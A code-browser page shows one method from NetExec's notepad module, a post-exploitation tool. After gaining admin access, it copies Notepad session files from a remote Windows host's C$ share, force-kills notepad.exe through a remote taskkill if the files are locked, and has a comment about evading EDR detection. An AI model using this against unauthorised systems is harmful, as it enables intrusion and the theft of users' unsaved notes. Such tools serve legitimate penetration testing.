hub / github.com/Pennyw0rth/NetExec / read_and_decode_file

Method read_and_decode_file

nxc/modules/notepad.py:92–122
(self, connection, context, file_path, user)

Source from the content-addressed store, hash-verified

        return string not in common_garbage

    def read_and_decode_file(self, connection, context, file_path, user):
        buf = BytesIO()
        try:
            connection.conn.getFile("C$", file_path, buf.write)
        except Exception as e:
            if "STATUS_SHARING_VIOLATION" in str(e):  # This means notepad.exe is open on the target.
                if self.kill:
                    try:
                        context.log.debug(f"Trying to kill notepad.exe process for {user} user.")
                        # TODO: Kill the process via RPC; connection.execute can be detected by EDRs and the module won't work. Or copy the target bin files without triggering the EDRs.
                        connection.execute("taskkill /IM notepad.exe /F")  # If notepad.exe was opened by the user, the process must be killed before the files can be read.
                        time.sleep(1)  # Sleep 1 second so the files can be found and read
                        context.log.debug(f"Notepad process was successfully killed for {user}")
                        connection.conn.getFile("C$", file_path, buf.write)
                    except Exception as e:
                        context.log.debug(f"Alternative method failed: {e}")
                else:
                    context.log.fail("Notepad.exe is open on target. If want to kill process, add kill option true. (-o KILL=True)")
                    return []
            else:
                # If it's a different error, just skip this file
                context.log.debug(f"Error accessing {file_path}: {e}")

        buf.seek(0)
        binary_data = buf.read()

        # Return only the meaningful strings
        return [
            string for _, string in self.extract_strings(binary_data)
            if self.is_meaningful_content(string)
        ]

    def on_admin_login(self, context, connection):
        self.context = context

Callers 1

on_admin_login · Method · 0.95

Calls 6

extract_strings · Method · 0.95
is_meaningful_content · Method · 0.95
fail · Method · 0.80
seek · Method · 0.80
execute · Method · 0.45
read · Method · 0.45

Tested by

no test coverage detected